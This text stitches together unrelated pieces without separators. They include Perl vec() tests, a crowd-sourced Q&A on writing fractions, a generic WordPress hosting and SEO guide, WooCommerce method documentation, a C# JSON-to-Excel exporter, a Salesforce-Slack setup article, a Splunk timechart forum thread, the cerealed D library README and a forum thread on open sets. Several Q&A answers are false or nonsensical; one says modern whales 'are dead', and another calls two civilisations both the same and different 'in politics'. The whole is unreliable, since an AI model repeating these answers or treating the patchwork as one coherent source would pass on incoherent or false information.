    vec($x, 2, 4) = 7;
    is($x, "\xff\xf7");

    # mixed magic

    $foo = "\x61\x62\x63\x64\x65\x66";
    is(vec(substr($foo, 2, 2), 0, 16), 25444);
    vec(substr($foo, 1,3), 5, 4) = 3;
    is($foo, "\x61\x62\x63\x34\x65\x66");

    # A variation of [perl #20933]
    {
        my $s = "";
        vec($s, 0, 1) = 0;
        vec($s, 1, 1) = 1;
        my @r;
        $r[$_] = \ vec $s, $_, 1 for (0, 1);
        ok(!(${ $r[0] } != 0 || ${ $r[1] } != 1));
    }

    my $destroyed;
    { package Class; DESTROY { ++$destroyed; } }

    $destroyed = 0;
    {
        my $x = '';
        vec($x,0,1) = 0;
        $x = bless({}, 'Class');
    }
    is($destroyed, 1, 'Timely scalar destruction with lvalue vec');

    use constant roref => \1;
    eval { for (roref) { vec($_,0,1) = 1 } };
    like($@, qr/^Modification of a read-only value attempted at /,
        'err msg when modifying read-only refs');

    {
        # downgradeable utf8 strings should be downgraded before accessing
        # the byte string.
        # See the p5p thread with Message-ID:
        # <CAMx+QJ6SAv05nmpnc7bmp0Wo+sjcx=ssxCcE-P_PZ8HDuCQd9A@mail.gmail.com>

        my $x = substr "\x{100}\xff\xfe", 1; # a utf8 string with all ords < 256
        my $v;
        $v = vec($x, 0, 8);
        is($v, 255, "downgraded utf8 try 1");
        $v = vec($x, 0, 8);
        is($v, 255, "downgraded utf8 try 2");
    }

    # [perl #128260] assertion failure with \vec %h, \vec @h
    {
        my %h = 1..100;
        my @a = 1..100;
        is ${\vec %h, 0, 1}, vec(scalar %h, 0, 1), '\vec %h';
        is ${\vec @a, 0, 1}, vec(scalar @a, 0, 1), '\vec @a';
    }
How do you show two-thirds in two different ways?

Best Answer: 2/3, 0.666..., and 66.7%

More answers: 2/3

Related questions

How do you show one-third in two different ways?
You can show it in many different ways: 1/3, 2/6, 3/9, 4/12, etc. If you want to show it as a percentage, it would be about 33%. If you want to show it as a decimal, it would be about 0.33.

What are two ways in which scientists can show creativity?
Scientists show creativity by experimenting in different ways.

How do you show one-tenth in two different ways?
1/10 and 0.1 are two ways to show one-tenth.

How do you show two-thirds in two different ways?
There are a bunch of different ways; here are some: 2/3, 4/6, 8/12, 0.666..., 2:3, 2 * 1/3.

List two ways in which your teeth are different?
List two ways in which our teeth are different.

What is the product of 117 in two different ways?
Write the product of 117 two different ways.

Show two wrong ways to write the symbol of calcium?
Show two wrong ways to write the symbol of calcium.

Show two different ways to make $17 using 1 dollar bills, 5 dollar bills and 10 dollar bills?
For example: 10 + 5 + 1 + 1, or 5 + 5 + 5 + 1 + 1.

How many ways are there to spell show time?
The word can be spelled in two ways: showtime and show time.

What are two different ways to show three-fourths is greater than two-thirds?
A. Multiply both fractions by the LCM of their denominators, 12: 3/4 * 12 = 9 and 2/3 * 12 = 8.
B. Convert them to percentages: 3/4 = 75% and 2/3 = 66.67%.
Both show that the first is bigger.

What are two ways that modern whales are different from pakicetus and two ways that they are similar?
They are dead.

What are two different ways to get the product of 117?
1 * 117 and -1 * -117 are two ways.

What are the identifying features of an isosceles triangle?
An isosceles triangle has two equal sides (and a third that is a different measure). It can also be identified by the fact that it has two equal angles and the third is different. The above also mean that two of the three altitudes, medians, etc. are equal while the third is different. If the third measure is not different, the triangle is equilateral.

What are two ways to show the number 69?

How many ways can you pronounce coupon?
It can be pronounced two different ways.

How many ways can you pronounce coupon?
It can be pronounced two different ways.

What are two ways Mesopotamia and Shang China were similar and two ways they were different?
They are the same in politics and social structure, but they are different in politics.

Which words with hard c can be pronounced two different ways?
The word Celtic can be pronounced in two different ways: either as Keltic or Seltic.

What are two ways to show two-thirds?
2/3 and 4/6.

How many different ways can you multiply two whole numbers together to get 36?
5 different ways, isn't it?

How many different ways are there to measure a pulse?
There are two different ways: you will find one in your neck and one in your wrist.

How can "run" be used in two different ways, with two different meanings, in a sentence?
Can you run my company while I am on leave? Can you run to my house and call my daughter? The above are two examples of how "run" can be used in different ways.

How many ways can a runner score from third base with two outs?
Eight.

What are two different ways to multiply?
There are two: compensation and compatible numbers.
The Ultimate Guide to Finding the Best WordPress Hosting

Looking for the best WordPress hosting? This comprehensive guide dives into the world of hosting services, providing insights, expert recommendations, and FAQs to help you make an informed decision.

Introduction

When it comes to creating a successful website or blog, choosing the right hosting service is crucial. Your website's speed, security, and overall performance depend on it. With countless options available, finding the best WordPress hosting can be overwhelming. In this guide, we'll walk you through everything you need to know about WordPress hosting, from understanding the types of hosting to factors to consider before making your choice.

Best WordPress Hosting: What Sets It Apart

WordPress, a popular content management system (CMS), powers more than 40% of the websites on the internet. Its flexibility and ease of use make it a preferred choice among individuals, businesses, and organizations. To ensure your WordPress-powered site runs seamlessly, it's essential to choose a hosting service that caters specifically to the platform's requirements.

Types of WordPress Hosting

Shared Hosting
Shared hosting is like living in an apartment building – you share resources with other residents. It's a cost-effective option for beginners, but it can lead to slower loading times and limited customization.

VPS Hosting (Virtual Private Server)
VPS hosting offers more control and resources compared to shared hosting. It's akin to living in a townhouse – you have your own space, but still share the infrastructure. This option is great for growing websites.

Managed WordPress Hosting
Managed hosting is like renting a fully serviced villa. The provider takes care of maintenance, backups, and security, allowing you to focus solely on creating content. It's an excellent choice for those without technical expertise.

Dedicated Hosting
Dedicated hosting is having a house all to yourself. You get an entire server to host your website, resulting in optimal performance and security. This option is suitable for large websites with high traffic.

Cloud Hosting
Cloud hosting is akin to staying in a luxury resort. Your website is hosted on a network of interconnected servers, ensuring scalability, reliability, and flexibility. It's perfect for websites with fluctuating traffic.

Factors to Consider When Choosing WordPress Hosting

1. Speed and Performance: A fast-loading website is crucial for user experience and SEO. Opt for a host with solid infrastructure and SSD storage.
2. Security Features: Look for hosting providers that offer robust security measures, including SSL certificates, firewalls, and malware scanning.
3. Uptime Guarantee: Choose a host with a high uptime guarantee (99.9% or higher) to ensure your website is accessible around the clock.
4. Customer Support: Reliable customer support can save you from technical headaches. 24/7 live chat, phone, and email support are ideal.
5. Scalability: Consider a host that allows easy scalability as your website grows. This prevents the need to migrate to a different host later.
6. Backup and Restore: Regular backups are essential in case of data loss. Choose a host that offers automated backups and easy restoration options.
7. Control Panel: A user-friendly control panel, such as cPanel, makes it easy to manage your website, domains, and emails.

Optimizing WordPress for Speed

Slow websites lead to high bounce rates and poor user engagement. Here are some tips to optimize your WordPress site for speed:

• Use a Lightweight Theme: Choose a minimalistic theme that doesn't come with excessive design elements and features.
• Image Compression: Compress images to reduce their file size without compromising quality. Plugins like Smush can help with this.
• Caching: Use caching plugins to store frequently accessed data, reducing the load time for returning visitors.
• Content Delivery Network (CDN): CDNs distribute your website's content across multiple servers globally, improving loading times for users from different locations.

FAQs

Q: What is the best WordPress hosting for beginners?
A: Shared hosting is a great starting point for beginners due to its affordability and user-friendly interface. Hosts like Bluehost and SiteGround offer excellent shared hosting plans.

Q: Is managed WordPress hosting worth the cost?
A: Managed hosting can be worth it for those who want to focus solely on their content while leaving technical aspects to experts. It's especially beneficial for non-tech-savvy users.

Q: Can I switch hosting providers later?
A: Yes, you can switch hosting providers, but it might involve some migration work. Choose a host that offers easy migration assistance.

Q: How does cloud hosting differ from traditional hosting?
A: Cloud hosting uses a network of interconnected servers, offering better scalability and flexibility compared to traditional hosting on a single server.

Q: What is an SSL certificate, and why is it important?
A: An SSL certificate encrypts data transmitted between a user's browser and your website, ensuring secure communication. It's crucial for user trust and SEO.

Q: How can I improve my website's security?
A: Opt for hosting providers that offer features like SSL certificates, firewalls, malware scanning, and regular security updates. Keep your WordPress and plugins updated as well.

Conclusion

Choosing the best WordPress hosting is a decision that can greatly impact your online presence. By understanding the types of hosting, important factors to consider, and optimization strategies, you're well-equipped to make an informed choice. Remember, the right hosting service will provide the foundation for a fast, secure, and successful WordPress website.

Comparing Top WordPress Hosting Providers

With an array of hosting providers available, let's take a closer look at some of the leading options for WordPress hosting:

1. Bluehost
Bluehost is a hosting provider recommended by WordPress itself. It offers easy WordPress installation, a user-friendly interface, and reliable customer support. Their shared hosting plans are great for beginners, while their managed WordPress hosting provides enhanced performance and security.

2. SiteGround
SiteGround is known for its exceptional customer support and speed optimization features. They offer various hosting options, including shared, cloud, and managed WordPress hosting. Their unique SuperCacher technology ensures quick loading times.

3. HostGator
HostGator provides affordable hosting plans with a focus on scalability. They offer both shared and managed WordPress hosting, along with a user-friendly control panel and a wide range of features.

4. WP Engine
WP Engine specializes in managed WordPress hosting, catering to businesses and high-traffic websites. Their hosting plans come with a suite of performance and security features, making them an excellent choice for those who prioritize these aspects.

5. DreamHost
DreamHost offers reliable and high-performance WordPress hosting. They provide managed hosting services as well as a user-friendly website builder. Their commitment to sustainability sets them apart from other hosting providers.

Tips for Migrating Your WordPress Site

If you're switching hosting providers or upgrading your plan, migrating your WordPress site can seem daunting. Here's a step-by-step guide to help you navigate the process:

1. Back Up Your Website: Before anything else, create a backup of your entire website, including files and databases.
2. Choose a Suitable Time: Schedule the migration during your website's off-peak hours to minimize disruption.
3. Set Up the New Hosting Account: Set up your new hosting account and install WordPress. Some hosts offer migration assistance.
4. Transfer Files and Databases: Transfer your website's files and databases from the old host to the new one. Plugins like "All-In-One WP Migration" can simplify this step.
5. Update Domain Settings: Point your domain to the new host by updating the DNS settings.
6. Test the New Site: Before directing all traffic to the new host, test the site's functionality to ensure everything works as expected.
7. Monitor and Troubleshoot: Keep an eye on your website for any issues that may arise post-migration. Address them promptly to ensure a smooth transition.

Stay Ahead with Best WordPress Hosting

In the competitive online landscape, a well-hosted website can make all the difference. The right hosting provider ensures optimal performance, security, and user experience. By considering your website's unique needs, understanding the types of hosting available, and conducting thorough research, you can confidently select the best WordPress hosting that aligns with your goals. Remember, investing in high-quality hosting is an investment in the success of your online presence.

In conclusion, finding the best WordPress hosting requires a careful assessment of your website's needs, the types of hosting available, and the features offered by various providers. Taking the time to make an informed decision can significantly impact your website's performance, security, and overall success. Whether you're just starting your WordPress journey or looking to enhance your existing site, the right hosting partner can provide the foundation you need to thrive in the digital world.

Remember, the world of hosting is dynamic, so periodically reviewing your hosting choice can ensure your website continues to meet your requirements. So, take the plunge, choose the best WordPress hosting, and watch your online presence flourish!

Maximizing SEO Benefits with WordPress Hosting

When it comes to hosting, it's not just about speed and security; search engine optimization (SEO) also plays a significant role. Here's how you can leverage your WordPress hosting for better SEO:

1. Fast Loading Times
Google considers page speed a ranking factor. A fast-loading website not only improves the user experience but also boosts your search engine rankings. Opting for a hosting provider with robust infrastructure and performance optimization features can positively impact your site's SEO.

2. SSL Certificate
Having an SSL certificate, indicated by the "https" in the URL, is crucial for website security. Google prioritizes secure websites in its search results, giving you an SEO advantage.

3. Uptime Guarantee
Search engines favor websites that are consistently available to users. A hosting provider with a high uptime guarantee ensures that your site remains accessible, contributing to better search engine rankings.

4. Mobile Responsiveness
With the mobile-first indexing approach, Google prioritizes the mobile version of your site's content for indexing and ranking. Make sure your hosting supports responsive design to provide a seamless experience across devices.

5. Content Delivery Network (CDN)
A CDN distributes your website's content across multiple servers worldwide, reducing latency and improving loading times. This not only enhances the user experience but also positively affects your site's SEO.

The Power of Quality Content

While selecting the best WordPress hosting is essential, content remains king. Quality, informative, and engaging content is what keeps visitors on your site and encourages them to explore further. Here's how to create content that resonates:

1. Keyword Research: Identify relevant keywords related to your niche and incorporate them naturally into your content. This helps search engines understand what your content is about.
2. High-Quality Images: Use high-quality images to enhance your content. Optimize images for the web to ensure they don't slow down your website's loading times.
3. Structured Content: Organize your content using headings (H2, H3, etc.) and bullet points. This not only makes your content easy to read but also helps search engines comprehend its structure.
4. Internal and External Links: Include internal links to other relevant pages on your website and external links to reputable sources. This improves the credibility of your content and its SEO.
5. Regular Updates: Keep your content up-to-date with the latest information. Search engines value fresh content, and regular updates can help maintain or improve your search rankings.

Conclusion: Your Path to Success

In the vast digital landscape, your website's success hinges on choosing the best WordPress hosting and optimizing your content for both users and search engines. By understanding the nuances of hosting types, evaluating key factors, and implementing effective SEO practices, you're well on your way to building a robust online presence.

Remember, finding the right hosting provider isn't a one-size-fits-all solution. Consider your website's unique requirements, growth plans, and the level of technical assistance you need. As your website evolves, periodic evaluations of your hosting choice can ensure you're always aligned with the latest trends and technologies.

So, embark on your journey with the knowledge that your hosting and content choices will serve as the foundation for your digital success. By selecting the best WordPress hosting, creating compelling content, and staying attuned to SEO best practices, you'll be poised for growth, engagement, and recognition in the online world.
Automattic\WooCommerce\Database\Migrations

MetaToMetaTableMigrator::classify_update_insert_records() · private · WC 1.0

Classify each record on whether to migrate or update.

Method of the class: MetaToMetaTableMigrator{}

No hooks.

Returns

Array[]. Returns two arrays: the first for records to insert, and the second for records to update.

Usage

    // private - only usable within the code of the main (parent) class
    $result = $this->classify_update_insert_records( $to_migrate, $already_migrated ): array;

$to_migrate (array) (required)
Records to migrate.

$already_migrated (array) (required)
Records already migrated.

Code of MetaToMetaTableMigrator::classify_update_insert_records(), WC 7.5.1

    private function classify_update_insert_records( array $to_migrate, array $already_migrated ): array {
        $to_update = array();
        $to_insert = array();

        foreach ( $to_migrate as $entity_id => $rows ) {
            foreach ( $rows as $meta_key => $meta_values ) {
                // If there is no corresponding record in the destination table then insert.
                // If there is single value in both already migrated and current then update.
                // If there are multiple values in either already_migrated records or in to_migrate_records, then insert instead of updating.
                if ( ! isset( $already_migrated[ $entity_id ][ $meta_key ] ) ) {
                    if ( ! isset( $to_insert[ $entity_id ] ) ) {
                        $to_insert[ $entity_id ] = array();
                    }
                    $to_insert[ $entity_id ][ $meta_key ] = $meta_values;
                } else {
                    if ( 1 === count( $meta_values ) && 1 === count( $already_migrated[ $entity_id ][ $meta_key ] ) ) {
                        if ( $meta_values[0] === $already_migrated[ $entity_id ][ $meta_key ][0]['meta_value'] ) {
                            continue;
                        }
                        if ( ! isset( $to_update[ $entity_id ] ) ) {
                            $to_update[ $entity_id ] = array();
                        }
                        $to_update[ $entity_id ][ $meta_key ] = array(
                            'id'         => $already_migrated[ $entity_id ][ $meta_key ][0]['id'],
                            // phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_value
                            'meta_value' => $meta_values[0],
                        );
                        continue;
                    }

                    // There are multiple meta entries, let's find the unique entries and insert.
                    $unique_meta_values = array_diff( $meta_values, array_column( $already_migrated[ $entity_id ][ $meta_key ], 'meta_value' ) );
                    if ( 0 === count( $unique_meta_values ) ) {
                        continue;
                    }
                    if ( ! isset( $to_insert[ $entity_id ] ) ) {
                        $to_insert[ $entity_id ] = array();
                    }
                    $to_insert[ $entity_id ][ $meta_key ] = $unique_meta_values;
                }
            }
        }
        return array( $to_insert, $to_update );
    }
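For orientation, a small hypothetical example of the input and output shapes (the entity ID, meta keys, and values below are illustrative, not taken from WooCommerce code):

    // Meta key 'color' exists in both source and destination with a single,
    // differing value -> classified as an update. Meta key 'size' is absent
    // from the destination -> classified as an insert.
    $to_migrate = array(
        42 => array(
            'color' => array( 'blue' ),
            'size'  => array( 'XL' ),
        ),
    );
    $already_migrated = array(
        42 => array(
            'color' => array(
                array( 'id' => 7, 'meta_value' => 'red' ),
            ),
        ),
    );

    // list( $to_insert, $to_update ) = $this->classify_update_insert_records( $to_migrate, $already_migrated );
    // $to_insert === array( 42 => array( 'size' => array( 'XL' ) ) )
    // $to_update === array( 42 => array( 'color' => array( 'id' => 7, 'meta_value' => 'blue' ) ) )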
Untitled · C# paste by user_0623289

    using System;
    using System.Collections.Generic;
    using System.Data;
    using System.IO;
    using System.Linq;
    using System.Text.Json;
    using System.Text.Json.Serialization;
    using ClosedXML.Excel;

    public class Document
    {
        [JsonPropertyName("documentId")]
        public int DocumentId { get; set; }
        [JsonPropertyName("siteName")]
        public string? SiteName { get; set; }
        [JsonPropertyName("serviceDate")]
        public DateTime ServiceDate { get; set; }
        [JsonPropertyName("templateName")]
        public string? TemplateName { get; set; }
        [JsonPropertyName("clientName")]
        public string? ClientName { get; set; } = "";
        [JsonPropertyName("clientFName")]
        public string? ClientFirstName { get; set; }
        [JsonPropertyName("clientMName")]
        public string? ClientMiddleName { get; set; }
        [JsonPropertyName("clientLName")]
        public string? ClientLastName { get; set; }
        [JsonPropertyName("dateOfBirth")]
        public string? DateOfBirth { get; set; }
        [JsonPropertyName("startTime")]
        public string? StartTime { get; set; }
        [JsonPropertyName("endTime")]
        public string? EndTime { get; set; }
        [JsonPropertyName("duration")]
        public string? Duration { get; set; } = "";
        [JsonPropertyName("shiftName")]
        public string? ShiftName { get; set; }
        [JsonPropertyName("docStatus")]
        public string? DocStatus { get; set; }
        [JsonPropertyName("staffName")]
        public string? StaffName { get; set; } = "";
        [JsonPropertyName("staffFName")]
        public string? StaffFirstName { get; set; }
        [JsonPropertyName("staffLName")]
        public string? StaffLastName { get; set; }
        [JsonPropertyName("serviceRate")]
        public string? ServiceRate { get; set; }
        [JsonPropertyName("clientDiagnosisName")]
        public string? ClientDiagnosisName { get; set; }
        [JsonPropertyName("isSigned")]
        public bool Signed { get; set; }
        [JsonPropertyName("isLocked")]
        public bool Locked { get; set; }
        [JsonPropertyName("authId")]
        public int AuthId { get; set; }
        [JsonPropertyName("billingStatusName")]
        public string? BillingStatusName { get; set; }
    }

    class Program
    {
        static void Main(string[] args)
        {
            // Read the exported JSON from disk.
            string? jsonData;
            try
            {
                jsonData = File.ReadAllText("data.json");
            }
            catch (Exception ex)
            {
                Console.WriteLine($"Error reading JSON file: {ex.Message}");
                return;
            }

            var options = new JsonSerializerOptions { PropertyNameCaseInsensitive = true };
            var data = JsonSerializer.Deserialize<List<Document>>(jsonData, options);
            if (data == null || data.Count == 0)
            {
                Console.WriteLine("No data found in JSON file.");
                return;
            }

            using (var workbook = new XLWorkbook())
            {
                var worksheet = workbook.Worksheets.Add("clientData");

                // Header row: one column per Document property, via reflection.
                var headerRow = worksheet.Row(1);
                var properties = typeof(Document).GetProperties().ToList();
                for (int i = 0; i < properties.Count; i++)
                {
                    headerRow.Cell(i + 1).Value = properties[i].Name;
                }

                for (int rowIndex = 0; rowIndex < data.Count; rowIndex++)
                {
                    var item = data[rowIndex];
                    var currentRow = worksheet.Row(rowIndex + 2);
                    for (int colIndex = 0; colIndex < properties.Count; colIndex++)
                    {
                        var propertyValue = properties[colIndex].GetValue(item);
                        var cell = currentRow.Cell(colIndex + 1);
                        if (propertyValue != null)
                        {
                            if (properties[colIndex].PropertyType == typeof(DateTime))
                            {
                                cell.Value = ((DateTime)propertyValue).ToString("dd-MM-yyyy");
                            }
                            else if (properties[colIndex].Name == "ServiceRate")
                            {
                                // Store the rate as a number with a currency format.
                                if (decimal.TryParse(propertyValue.ToString(), out decimal rate))
                                {
                                    cell.Value = rate;
                                    cell.Style.NumberFormat.Format = "$ #,##0.00";
                                }
                            }
                            else if (properties[colIndex].Name == "ClientName")
                            {
                                cell.Value = string.Join(" ", item.ClientFirstName, item.ClientMiddleName, item.ClientLastName);
                            }
                            else if (properties[colIndex].Name == "StaffName")
                            {
                                cell.Value = string.Join(", ", item.StaffFirstName, item.StaffLastName);
                            }
                            else if (properties[colIndex].Name == "Duration")
                            {
                                // Render the duration as "hh:mm tt - hh:mm tt".
                                DateTime startTime;
                                DateTime endTime;
                                if (DateTime.TryParse(item.StartTime, out startTime) && DateTime.TryParse(item.EndTime, out endTime))
                                {
                                    cell.Value = $"{startTime.ToString("hh:mm tt")} - {endTime.ToString("hh:mm tt")}";
                                }
                            }
                            else
                            {
                                cell.Value = propertyValue.ToString();
                            }
                        }
                        else
                        {
                            cell.Value = string.Empty;
                        }
                    }
                }

                // Drop unwanted columns, deleting from right to left so the
                // remaining column letters don't shift under us.
                worksheet.Columns("Q").Delete();
                worksheet.Columns("P").Delete();
                worksheet.Columns("K").Delete();
                worksheet.Columns("J").Delete();
                worksheet.Columns("H").Delete();
                worksheet.Columns("G").Delete();
                worksheet.Columns("F").Delete();

                try
                {
                    worksheet.Columns().AdjustToContents();
                    workbook.SaveAs("output.xlsx");
                    Console.WriteLine("Excel file saved as: output.xlsx");
                }
                catch (Exception ex)
                {
                    Console.WriteLine($"Error saving Excel file: {ex.Message}");
                }
            }
        }
    }
How Can I Manage Salesforce Cases in Slack?

November 11, 2021 · ANALYSIS, RESEARCH AND INSIGHTS, SALES ANALYSIS, TECH STACK ANALYSIS

Have you ever wanted to manage cases or trouble tickets in Slack, and additionally input the same data into Salesforce? Then get ready, this one is for you.

Before you get started with any project, it's a good idea to plan. Salesforce structure and object standards do most of the planning for us; we just need to choose the parent object (Account). You can also configure it so the case's Contact is the parent. In this article, we will manage all cases that are attached to a specific account, 'Acme.'

Abstract process view

On a high level: any time a case is created or updated for my subscribed account, I publish it to my chosen Slack channel.

Step By Step:

1. Install the Salesforce app in Slack

This is the initial connection to allow Salesforce to talk to Slack. In step 2, we will allow a connection to Slack from Salesforce. This gives that extra layer of security on both sides. Click the Add to Slack URL below:
https://slack.com/interop-apps/salesforce/install

2. Install the companion app in Salesforce from the Salesforce AppExchange

Don't worry, it comes from the source. It's official. This is the other side of the connection we set up in step 1.
https://appexchange.salesforce.com/appxListingDetail?listingId=a0N3A00000FnD9mUAF

3. Create a specific Slack channel aligned with your support structure

Mapping an account's cases to a Slack channel, for example:
1. #apple_SupportCases
2. #acme_SupportCases
3. #acme_BusinessCases

4. Add an object to watch (Cases) and alert from Salesforce to Slack

5. Voilà! Real-time notifications of cases in Slack.

If you want to get fancy, you can start to be creative with your flows and naming conventions to assist your subscription use.

Like what you just read? There's more where that came from.
How do I get the timechart results for a summary index query?

Builder:
I have a query which uses the summary index and some lookup tables with eval conditions, and ends with...

    | chart count by field_a, field_b

...which works fine and gives me the statistics. But when I tried the same query with "chart count by" replaced by "timechart count by", it gives me the following error and doesn't work:

    Error in 'timechart' command: The argument 'field_b' is invalid.

Could anyone explain why the query with timechart doesn't work but the query with chart did?

SplunkTrust:
@pavanae Is your problem resolved? If so, please accept one of the answers.
--- If this reply helps you, an upvote would be appreciated.

Explorer:
The main thing is that timechart doesn't let you include multiple fields in its by clause. Commands like stats and chart do. You can also fake it by concatenating your two fields into one, and using that in timechart:

    | eval marker=field_a+field_b | timechart count by marker

Contributor:
This is what I usually do, with the only change that I concatenate using the period "." symbol, to eliminate possible weirdness with it trying to add numeric values together:

    | eval marker=field_a.field_b | timechart count by marker

Champion:
Since the X axis is time and the Y axis is field_a, field_b is invalid. How's this?

    (your search) | bin span=XX _time | stats count by _time, field_a, field_b

Builder:
It doesn't give me an error now, but I see no results. Looks like _time is not working, though I see _time on all the summary indexing events.

Champion:
What is the state of not functioning? What is set in the _time of the search results?
cerealed 0.6.9

Binary serialisation library for D.

My DConf 2014 talk mentioning Cerealed.

Binary serialisation library for D. Minimal to no boilerplate necessary.

Example usage:

    import cerealed;

    assert(cerealise(5) == [0, 0, 0, 5]); // returns ubyte[]
    cerealise!(a => assert(a == [0, 0, 0, 5]))(5); // faster than using the bytes directly
    assert(decerealise!int([0, 0, 0, 5]) == 5);

    struct Foo { int i; }
    const foo = Foo(5);
    // alternate spelling
    assert(foo.cerealize.decerealize!Foo == foo);

The example below shows off a few features. First and foremost, members are serialised automatically, but can be opted out via the @NoCereal attribute. Also importantly, members to be serialised in a certain number of bits (important for binary protocols) are signalled with the @Bits attribute with a compile-time integer specifying the number of bits to use.

    struct MyStruct {
        ubyte mybyte1;
        @NoCereal uint nocereal1; // won't be serialised
        @Bits!4 ubyte nibble;
        @Bits!1 ubyte bit;
        @Bits!3 ubyte bits3;
        ubyte mybyte2;
    }

    assert(MyStruct(3, 123, 14, 1, 2, 42).cerealise == [3, 0xea /*1110 1 010*/, 42]);

What if custom serialisation is needed and the default, even with opt-outs, won't work? If an aggregate type defines a member function void accept(C)(ref C cereal) it will be used instead. To get the usual automatic serialisation from within the custom accept, the grainAllMembers member function of Cereal can be called, as shown in the example below. This function takes a ref argument so rvalues need not apply. The function to use on Cereal to marshall or unmarshall a particular value is grain. This is essentially what Cerealiser.~= and Decerealiser.value are calling behind the scenes (and therefore cerealise and decerealise).

    struct CustomStruct {
        ubyte mybyte;
        ushort myshort;
        void accept(C)(auto ref C cereal) {
            // do NOT call cereal.grain(this), that would cause an infinite loop
            cereal.grainAllMembers(this);
            ubyte otherbyte = 4; // make it an lvalue
            cereal.grain(otherbyte);
        }
    }

    assert(CustomStruct(1, 2).cerealise == [1, 0, 2, 4]);
    // because of the custom serialisation, passing in just [1, 0, 2] would throw
    assert([1, 0, 2, 4].decerealise!CustomStruct == CustomStruct(1, 2));

The other option when custom serialisation is needed that avoids boilerplate is to define a void postBlit(C)(ref C cereal) function instead of accept. The marshalling or unmarshalling is done as it would in the absence of customisation, and postBlit is called to fix things up. It is a compile-time error to define both accept and postBlit. Example below.

    struct CustomStruct {
        ubyte mybyte;
        ushort myshort;
        @NoCereal ubyte otherByte = 4;
        void postBlit(C)(auto ref C cereal) {
            // no need to handle mybyte and myshort, already done
            if(mybyte == 1) {
                cereal.grain(otherByte);
            }
        }
    }

    assert(CustomStruct(1, 2).cerealise == [1, 0, 2, 4]);
    assert(CustomStruct(3, 2).cerealise == [3, 0, 2]);

For more examples of how to serialise structs, check the tests directory or real-world usage in my MQTT broker also written in D.

Arrays are by default serialised with a ushort denoting array length, followed by the array contents. It happens often enough that networking protocols have explicit length parameters for the whole packet, and that array lengths are implicitly determined from this. For this use case, the @RestOfPacket attribute tells cerealed to not add the length parameter. As the name implies, it will "eat" all bytes until there aren't any left.

    private struct StringsStruct {
        ubyte mybyte;
        @RestOfPacket string[] strings;
    }

    // no length encoding for the array, but strings still get a length each
    const bytes = [5,
                   0, 3, 'f', 'o', 'o',
                   0, 6, 'f', 'o', 'o', 'b', 'a', 'r',
                   0, 6, 'o', 'h', 'w', 'e', 'l', 'l'];
    const strs = StringsStruct(5, ["foo", "foobar", "ohwell"]);
    assert(strs.cerealise == bytes);
    assert(bytes.decerealise!StringsStruct == strs);

Derived classes can be serialised via a reference to the base class, but the child class must be registered first:

    class BaseClass {
        int a;
        this(int a) { this.a = a; }
    }
    class ChildClass : BaseClass {
        int b;
        this(int a, int b) { super(a); this.b = b; }
    }

    Cereal.registerChildClass!ChildClass;
    BaseClass obj = new ChildClass(3, 7);
    assert(obj.cerealise == [0, 0, 0, 3, 0, 0, 0, 7]);

There is now support for InputRange and OutputRange objects. Examples can be found in the tests directory.

Advanced Usage

Frequently in networking programming, the packets themselves encode the length of elements to follow. This happens often enough that Cerealed has two UDAs to automate this kind of serialisation: @ArrayLength and @LengthInBytes. The former specifies how to get the length of an array (usually a variable); the latter specifies how many bytes the array takes. Examples:

    struct Packet {
        ushort length;
        @ArrayLength("length") ushort[] array;
    }

    auto pkt = decerealise!Packet([0, 3,               // length
                                   0, 1, 0, 2, 0, 3]); // array of 3 ushorts
    assert(pkt.length == 3);
    assert(pkt.array == [1, 2, 3]);

    struct Packet {
        static struct Header {
            ubyte ub1;
            ubyte totalLength;
        }
        enum headerSize = unalignedSizeof!Header; // 2 bytes
        Header header;
        @LengthInBytes("totalLength - headerSize") ushort[] array;
    }

    auto pkt = decerealise!Packet([7,            // ub1
                                   6,            // totalLength in bytes
                                   0, 1, 0, 2]); // array of 2 ushorts
    assert(pkt.header.ub1 == 7);
    assert(pkt.header.totalLength == 6);
    assert(pkt.array == [1, 2]);

Authors:
• Atila Neves

Dependencies: concepts
Open interval (set) end points and differentiability

#1 · Jul 30, 2016

When we talk about differentiability on a set X, the set has to be open. And if a set X is open, there exists epsilon > 0, where epsilon is in R. Then if x is in X, y = x ± epsilon and y is also in X.

But this contradicts what I was taught in high school: end points are excluded in an open interval. Could anyone clarify this for me?

Also, since epsilon is an arbitrary number, if we set it to be infinite then would X be R (the entire real number set)?

#2 · Stephen Tashi (Science Advisor) · Jul 31, 2016

That isn't a grammatically correct statement and it isn't the correct definition for "set X is open". A variable representing a single number can't be "set to be infinite" and it can't be set equal to a set of numbers.

#3 · pwsnafu (Science Advisor) · Jul 31, 2016

Let ##X \subset \mathbb{R}##. We say ##X## is an open set if and only if for all ##x \in X## there exists ##\epsilon > 0## such that ##(x-\epsilon, x+\epsilon) \subset X##. The order of the ##\epsilon## and ##x## is important: ##\epsilon## depends on ##x##. This means it is not arbitrary.

#4 · fresh_42 (Mentor) · Jul 31, 2016

Why? What about ##f: [0,1] \rightarrow \mathbb{R}## with ##f(x) = x## or ##f(x) = \frac{1}{x}##? Why shouldn't we talk about differentiability here?

#5 · Stephen Tashi · Jul 31, 2016

It's also clearer to say "for each ##x \in X##" because we aren't insisting that there is a single ##\epsilon## that works for all ##x##.

#6 · Jul 31, 2016

It is not usually done in analysis books (at least not introductory ones). The question is how we should define differentiability at the boundary. You probably have quite a good idea how to do that, but it does complicate matters somewhat. Furthermore, differentiability at the boundary is almost never needed for elementary analysis results. Also, when we generalize analysis to ##\mathbb{R}^n## it becomes even more difficult to describe differentiability at the boundary. It's not impossible to do it, but it takes some effort which is usually spent in other places. In fact, I know of two good generalizations of differentiability at the boundary, and I'm not sure whether they even are equivalent. I should think a bit about this.

#7 · fresh_42 · Jul 31, 2016

I basically wanted to animate the OP to think about why an open neighborhood is "needed", and to sharpen his argumentation, because "the set has to be open" isn't correct in this generality. A reflex, if you like. I thought it would help to understand differentials as linear approximations and what approximation really means in this context. (I wonder if any derivation on any ring could be considered a differentiation .... with no metric in sight ...)

#8 · Jul 31, 2016

You mean in the sense of differential algebra?
https://en.wikipedia.org/wiki/Differential_algebra

#10 · Aug 5, 2016

Thanks. And I am sorry for the confusing statements and wording. I sort of understand why we need an "open set" when we define differentiability on a set X. As far as I know, we'd need to define right or left differentiability if the set is closed. But here I have two questions:

1. I learned in high school that open intervals exclude end points. But in an open set X, it would include end points and their neighborhoods. Are they different in terms of definition?

2. If we consider the boundary points of X, intuitively half of (x-eps, x+eps) would include the interval outside the set X. Do we define (x-eps, x+eps) to be in X because epsilon is small?

